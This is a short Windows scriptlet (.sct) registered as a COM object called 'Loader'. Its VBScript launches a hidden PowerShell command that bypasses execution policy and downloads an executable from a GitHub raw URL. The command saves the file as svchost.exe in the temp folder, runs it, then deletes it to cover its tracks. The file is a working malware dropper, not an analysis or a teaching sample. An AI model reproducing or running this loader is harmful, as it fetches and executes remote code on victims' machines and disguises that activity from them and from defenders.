<?XML version="1.0"?>
<scriptlet>
<registration
    description="Loader"
    progid="Loader"
    version="1.00"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}"
    remotable="true">
    
    <script language="VBScript">
        <![CDATA[
            Set objShell = CreateObject("WScript.Shell")
            
            ' PowerShell command to download and execute
            strCmd = "powershell -NoP -W Hidden -Exec Bypass -C ""$d=$env:TEMP+'\svchost.exe';(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/sircapone1306-wq/Capone-Bypass/main/LilithClicker.exe',$d);Start-Process $d;Start-Sleep 5;Remove-Item $d -Force"""
            
            objShell.Run strCmd, 0, False
            
            Set objShell = Nothing
        ]]>
    </script>
</registration>
</scriptlet>
